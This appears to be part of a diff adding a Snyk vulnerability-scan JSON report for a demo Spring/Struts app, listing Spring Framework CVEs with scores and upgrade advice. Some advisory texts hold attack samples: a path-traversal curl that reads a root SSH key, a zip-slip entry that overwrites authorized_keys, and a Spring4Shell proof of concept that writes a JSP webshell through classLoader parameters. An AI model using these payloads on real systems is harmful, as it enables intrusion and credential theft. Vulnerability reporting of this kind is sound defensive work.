"severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:24.703024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", + "epssDetails": { + "percentile": "0.23203", + "probability": "0.00054", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22060" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-06T12:31:26.181234Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-01-06T11:18:34Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2022-01-06T17:17:24.995166Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:10.667113Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.19.RELEASE", + "org.springframework:spring-core@5.2.19.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/util/StringUtils.java", + "className": "StringUtils", + "functionName": "cleanPath" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16414", + "title": "GitHub Issue" + }, + { + "url": "https://jira.spring.io/browse/SPR-12354", + "title": "Jira Issue" + }, + { + "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", + "title": "JVNDB" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", + "title": "NVD" + }, + { + "url": "https://pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:25.325641Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", + "epssDetails": { + "percentile": "0.69801", + "probability": "0.00301", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3578" + ], + "CWE": [ + "CWE-22" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.465000Z", + "functions_new": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "className": "org.springframework.util.StringUtils", + "functionName": "cleanPath" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-09-05T17:16:58Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2014-09-05T17:16:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:07.314890Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.9.RELEASE", + "org.springframework:spring-core@3.2.9.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "4ra1n" + ], + "semver": { + "vulnerable": [ + "[,5.2.20.RELEASE)", + "[5.3.0,5.3.17)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.20.RELEASE", + "5.3.17" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28145", + "title": "GitHub Issue" + }, + { + "url": "https://pivotal.io/security/cve-2022-22950", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:01.573408Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", + "epssDetails": { + "percentile": "0.35300", + "probability": "0.00081", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22950" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2022-03-29T10:05:31.971026Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-03-29T09:51:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2022-03-29T14:24:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.044801Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Google OSS-Fuzz team" + ], + "semver": { + "vulnerable": [ + "[,5.2.23.RELEASE)", + "[5.3.0,5.3.26)", + "[6.0.0,6.0.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.23.RELEASE", + "5.3.26", + "6.0.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20861", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:22.626014Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", + "epssDetails": { + "percentile": "0.48906", + "probability": "0.00133", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20861" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-03-23T12:26:39.837900Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-03-23T11:49:46Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-03-23T12:37:13.052190Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.291695Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Google OSS-Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,5.2.24.RELEASE)", + "[5.3.0,5.3.27)", + "[6.0.0,6.0.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.24.RELEASE", + "5.3.27", + "6.0.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20863", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:15.433654Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", + "epssDetails": { + "percentile": "0.70100", + "probability": "0.00306", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20863" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-04-14T06:33:20.884492Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-04-14T06:25:45Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-04-14T06:33:21.063044Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:09.820460Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ] + }, + "exploit": "High", + "fixedIn": [ + "5.2.20", + "5.3.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "filePath": "org/springframework/beans/CachedIntrospectionResults.java", + "className": "CachedIntrospectionResults", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", + "title": "CyberKendra Post" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", + "title": "GitHub Commit" + }, + { + "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", + "title": "LunaSec Blog" + }, + { + "url": "https://blog.payara.fish/payara-and-spring4shell", + "title": "Payara Blogpost" + }, + { + "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", + "title": "Payara PoC" + }, + { + "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", + "title": "Snyk Blog - Technical Breakdown" + }, + { + "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", + "title": "Snyk PoC" + }, + { + "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", + "title": "Spring Security Announcement" + }, + { + "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", + "title": "Spring Tomcat Mitigation Advice" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-30T15:25:03.231650Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). \r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## 